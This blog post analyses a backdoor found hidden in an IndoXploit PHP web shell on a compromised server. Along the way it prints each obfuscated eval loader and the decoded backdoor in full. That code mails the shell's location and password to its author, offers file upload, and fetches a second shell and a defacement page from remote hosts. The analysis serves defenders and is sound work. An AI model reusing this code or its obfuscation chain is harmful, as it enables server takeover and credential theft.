I was recently taking a look at the code of a version of the IndoXploit web shell that I located while investigating a compromised server (full source here) when I noticed this line:
eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
Curious, I decoded the contents of the pastebin URL that was being executed via the eval function:
eval(str_rot13(gzinflate(str_rot13(base64_decode(('Lc29DoIwFEDhaukEAxQDGn8mUiM6CG80U08IJdwKJrW9AlefXlk8w0w/rFFiPAXgxMsUV6bQwFT3ylcUKkaCC4O0nBcwp7RiXbturOnxDktXlmbMuS2ZphZHG+1o4xBzDt3BVjBL+9fgTw//T6yp47Lz/hPFsJzSbeQ5SftbTgshtcjtatEQMyHR6uYH2/hV0oQEAxMxrQeGpKa5+AI='))))));
As usual, more encoding. The code being executed here is:
eval(base64_decode(exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg")["COMPUTED"]["UserComment"]));
Okay, now things are starting to get interesting. This bit of code pulls base64 encoded exif data from an image, and then executes it as PHP.
Let’s download the image and see what’s being executed:
The EXIF data being extracted from the image and executed (decoded):
eval(str_rot13(gzinflate(base64_decode('rVZbj6NGGn1fKf9h33qiyQNge6ZRFCnYgLmVwaZc2H5pATEGbHNxQ5ni1+erck/P7CSryUr7UEJQ1Hc553wHfqcxfclupw9PSX5K89NLnb++3o407p5+kX7+9ad//f7+QkuzlFWXl9vxmByzp1/+/dgXty/HW5ocT3Dsg3h6Kyr2oa6y26fpS3trkvb24Sna2iVZSx2hq+dqa5zq9bRb4J55jv5xsTXSFp/Zgq5OC9Nf3hx7qBwtgfdPZF0WLWZSja2Pi0BNkBMOi/uZ1ooxg+sdOTMJueTjAndnuB9rZSYRjHpPsVQ3iCzP6YvaCRtC/Wvlpmxhl1SDRbBW1Fi98HuioPGwXpWHsKSL4cw8N8pJaBRkE7F2a7DmXhZoVPN2PX3eK295JtGJ4PAOtRX1XW4I4zFl1uK+QGu4j/2imRg8L6tHTbq5vshdu3YGZ0rIIe0VVDSjdEI4lDxR06yvHVG33OBz4TmQW8RlAz/bun5WK+GA3Kgh9+lzi0MKuHTeqF4QtkUvB1hQn9SIfR322nutnIuG10gPpehz7YvzoqfA/899zLF47FfOrGxdvWu3rERL2B9RWmOb95R7jiz6QSPLEK99q6W3kddOZIEj1IACnyLlG5yvq/Id5/s5rWNfhvzvsdyJXdYhj2XMGixwuLZOdKpcgWMqcGUqx4bfK55zlkVdDM5htYd8uHLODGrgWpEQ52tigF5AQ9vHM8+JMrTkPArs+bOvGgrUh64o+bzW0xTRrotCVV/KmuVc2leOfyRL3WIJOv4uJ+g6JdtMC0Y27jaA6cSf7QLj1RjYwbC1OlI4dlYM9MctlktXEVzHrlnyHNi0zqElZ7HA02xbyCdwgXzpzvQ/k5W0QzAT9WUVLzDXu8bqmGtzqgX/D90zzTZlLbQuvm1tzgvd0rulFS7tTUhIsOm/x2lBG1HTq87rOl/RdzWu9eSLvkbP0UR+G4dJrcg98NM1CvskuLsLPX2jQW1E968a9RQ7b7m2YeYXQ+sbUnggoa0vN6pvBL6m25qlW11HlmXh3afx/LLSglh6LM4FZtdGsSXBhWQDj6T8MkeEAbYu58y+V/gZvMmQm0Bwr0L9xf7y/ONVSjuYz7/NA7Uf/5KD+X0z0SbgHwPZWN2ckjzCoQy+8drg8Npc4V3q/0/5K8frdljM5ity+xR857oLmhxhEu/Mgcf7TAJfJdjOGsXqbnAm2oK/cT+OtRlyjNRT+tXN4fw8556insid12Hw+fsDOJX4u6DTpWFHDqw64lphCJY61y05BJ0CbslQYbvnXiRiD+hSK9InspGhZ6OvAvD+MeTxjzqWe/CvU+toRXWZAf/Sx7ecJ+RqV89p2SOGPeVeWIEPzamfgB+Xc/pcEDr9UT05AS4syTbtwTZhnkzDDm2YRcuVbdOEGZsDDjAjaR10Q4ufM3j/vd99sBpqxwZOwxjxGRXfKpg3Oog+a3MFeIKHYDvfBYRjTeEMbS8kJTBfBBspMlcJ+ALdLUVf0m2rdwtzRUWfI5o0I5OQ2UEsiL81pm3AY6ejx2dBsZIISymvEbg51YoOsWaDR0l2WHsg7uEz2cKF/gONwIKaO9BJUgG2yNUTwG5r2EZN7uAPoIs6iNqdyURvnjPrq+sGavVH4adKy9pQvXOP4R7QXDoK33Cp2R4+7S8q+AvgcpnFtaLG4HFCP/uJBt90q/DGHuKfs8OSXPdKlOxj3icRfUV4FiMlnKDlIxd4JqtpR2EWGMd+H/sJzGNG4oaCBxYN9eG/wOp2QRSDj6eNsulgZo6EPnBrJxHPmXwTN4PZAh/NzoIDcBbwvqvAfGxjz23ZwRRnxX8FeBuPfagVrX9811MJsAE9HvIG9yXPwz3unY/YgHMy772stiu6X68UDYLNJ/+cl7f5/TteBuQIP6euOaRiZh+9/JiXNXjHhPuMwbyR5fsRPN9UL57bFNqQ+to12s+x9EWXOVLavgVf+JaDw7bL+X8aoeVfNT22PcS9eqZfQj30Dduven7Ddh8YfT2Gx/+G/eP5l7mCuAP88yihVDlqPr/70/3YS7VJOJ6/Pf3M/yz/BA=='))));
The code being executed here results in…another encoded function! (last one, I promise…):
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@error_reporting(0);
eval(base64_decode('JHVwID0gIiA8aHRtbD4gPGhlYWQ+PHRpdGxlPiAtPSBTeWVkaWNoID0tIDwvdGl0bGU+PC9oZWFkPjxib2R5PjxjZW50ZXI+PGgxPjxmb250IGZhY2U9XCJUYWhvbWFcIiBzaXplPVwiNVwiIGNvbG9yPVwiI2ZmMDAwMFwiPkxlYXJuIFRvIEJldHRlcjwvZm9udD48L2gxPjxmb3JtIGFjdGlvbj1cIlwiIG1ldGhvZD1cInBvc3RcIiBlbmN0eXBlPVwibXVsdGlwYXJ0L2Zvcm0tZGF0YVwiIG5hbWU9XCJ1cGxvYWRlclwiIGlkPVwidXBsb2FkZXJcIj48dGFibGUgYm9yZGVyPVwiMVwiPjx0cj48dGQgYmdjb2xvcj1cIiMwMDAwMDBcIj48Zm9udCBjb2xvcj1cIiMwMGZmMDBcIj48aW5wdXQgdHlwZT1cImZpbGVcIiBuYW1lPVwiZmlsZVwiIHNpemU9XCI1MFwiPjx0ZCBiZ2NvbG9yPVwiIzAwMDAwMFwiPjxpbnB1dCBuYW1lPVwiX3VwbFwiIHR5cGU9XCJzdWJtaXRcIiBpZD1cIl91cGxcIiB2YWx1ZT1cIlVwbG9hZCBGaWxlXCI+PC90ZD48L3RkPjwvdHI+PC90YWJsZT48L2Zvcm0+PC9jZW50ZXI+PC9ib2R5PiI7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCBGaWxlIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IA0KZWNobyAnPGI+PGNlbnRlcj4NCjxmb250IGZhY2U9XCJUYWhvbWFcIiBzaXplPVwiNVwiIGNvbG9yPVwiI2ZmMDAwMFwiPlNVS1NFUyBVUExPQUQgTUFTVEFIICEhPC9jZW50ZXI+PC9iPic7IA0KfQ0KZWxzZSB7IA0KZWNobyAnDQo8Zm9udCBmYWNlPVwiVGFob21hXCIgc2l6ZT1cIjVcIiBjb2xvcj1cIiNmZjAwMDBcIj48Y2VudGVyPjxiPkdBR0FMIFVQTE9BRCBNQVNUQUggITwvYj4nOyANCn0NCn0NCmlmKGlzc2V0KCRfR0VUWyIwdXBsb2FkIl0pKXsNCmVjaG8gIiR1cCI7DQp9DQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KIGlmKGlzc2V0KCRfR0VUWyIwY2VrIl0pKXsNCmVjaG8gIlBhc3N3b3JkIEUgOiIuJGF1dGhfcGFzczsNCiB9DQovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KaWYgKGZpbGVfZXhpc3RzKCcuZGInKSkNCiB7ICB9IGVsc2Ugew0KJHRvID0gInN5ZWRpY2hAeWFob28uY29tIjsNCiRzdWJqZWN0ID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gIkZyb206IE1hc3RhaCA8amFuY29rQG1hdGFtdWNvay5jb20+IjsNCiRtZXNzYWdlID0gIkV4cGxvaXQgOiBodHRwOi8vIi4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQokbSA9IGZvcGVuKCIuZGIiLCAidyIpIG9yIGRpZSAoIiAiKTsNCiR0eHQgPSAiIjsNCmZ3cml0ZSgkbSwgJHR4dCk7DQpmY2xvc2UoJG0pOw0KY2htb2QoIi5kYiIsMDY0NCk7IH0NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vDQogaWYoaXNzZXQoJF9HRVRbIjBzaGVsbCJdKSl7DQokYW5hazEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zaXRlcy5nb29nbGUuY29tL3NpdGUvYmhzaGxsMTIzL2JoLnR4dCIpOw0KJG5nZ2F3ZTEgPSBmb3BlbigidGhlbWVzLnBocCIsInciKSBvciBkaWUgKCJnYWJpc2EgcGFrIik7DQpmd3JpdGUoJG5nZ2F3ZTEsJGFuYWsxKTsNCmZjbG9zZSgkbmdnYXdlMSk7DQpoZWFkZXIgKCJMb2NhdGlvbjp0aGVtZXMucGhwIik7IA0KY2htb2QoInRoZW1lcy5waHAiLDA2NDQpO30NCi8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KaWYoaXNzZXQoJF9HRVRbIjBkZWZhY2UiXSkpew0KJGFuYWsgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvNkpBNzJLOG0iKTsNCiRuZ2dhd2UgPSBmb3BlbigiMHguaHRtIiwidyIpIG9yIGRpZSAoImdhYmlzYSBwYWsiKTsNCmZ3cml0ZSgkbmdnYXdlLCRhbmFrKTsNCmZjbG9zZSgkbmdnYXdlKTsNCmhlYWRlciAoIkxvY2F0aW9uOjB4Lmh0bSIpO30='));
And finally, we see the prize – a backdoor which has been included in the shell:
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@error_reporting(0);
$up = " <html> <head><title> -= Syedich =- </title></head><body><center><h1><font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">Learn To Better</font></h1><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"><table border=\"1\"><tr><td bgcolor=\"#000000\"><font color=\"#00ff00\"><input type=\"file\" name=\"file\" size=\"50\"><td bgcolor=\"#000000\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload File\"></td></td></tr></table></form></center></body>";
if( $_POST['_upl'] == "Upload File" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b><center>
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\">SUKSES UPLOAD MASTAH !!</center></b>';
}
else {
echo '
<font face=\"Tahoma\" size=\"5\" color=\"#ff0000\"><center><b>GAGAL UPLOAD MASTAH !</b>';
}
}
if(isset($_GET["0upload"])){
echo "$up";
}
/////////////////////////////
if(isset($_GET["0cek"])){
echo "Password E :".$auth_pass;
}
/////////////////////////////
if (file_exists('.db'))
{ } else {
$to = "syedich@yahoo.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <jancok@matamucok.com>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);
chmod(".db",0644); }
/////////////////////////////
if(isset($_GET["0shell"])){
$anak1 = file_get_contents("https://sites.google.com/site/bhshll123/bh.txt");
$nggawe1 = fopen("themes.php","w") or die ("gabisa pak");
fwrite($nggawe1,$anak1);
fclose($nggawe1);
header ("Location:themes.php");
chmod("themes.php",0644);}
//////////////////////////////
if(isset($_GET["0deface"])){
$anak = file_get_contents("http://pastebin.com/raw/6JA72K8m");
$nggawe = fopen("0x.htm","w") or die ("gabisa pak");
fwrite($nggawe,$anak);
fclose($nggawe);
header ("Location:0x.htm");}
Functions of this backdoor:
- Emailing the backdoor author the IndoXploit shell’s location
- Emailing the backdoor author the password (if any) that has been configured in the IndoXploit shell by the the person who put IndoXploit there in the first place.
- Dropping a hidden file to let the backdoor know if it has already sent this location and password information to the author, so that it can prevent more than one email per infected host/location from being sent.
- Ability to provide the IndoXploit shell’s current password on the shell’s login page when presented with a specific GET variable/value combination, in case the password has changed.
- File upload function.
Missing Functions:
Two other functions looked to include the ability to drop what appears to be a version of “blackhat shell” (another common web shell) and one which appears to add an html file to the server containing a defacement message.
Unfortunately, at the time this was located, the URLs containing the code executed in those functions had been pulled offline by google and pastebin respectively for ToS violations, so I wasn’t able to analyze their code to confirm.
Final Thoughts:
Despite the functions missing due to ToS takedowns, the capabilities still present and functional in this backdoor are more than sufficient to provide whoever put it there with access to effectively any site/server where their backdoored IndoXploit shell is placed.
This will be the first of a series of posts regarding backdoors I’ve found hidden within these types of tools which were located on compromised servers.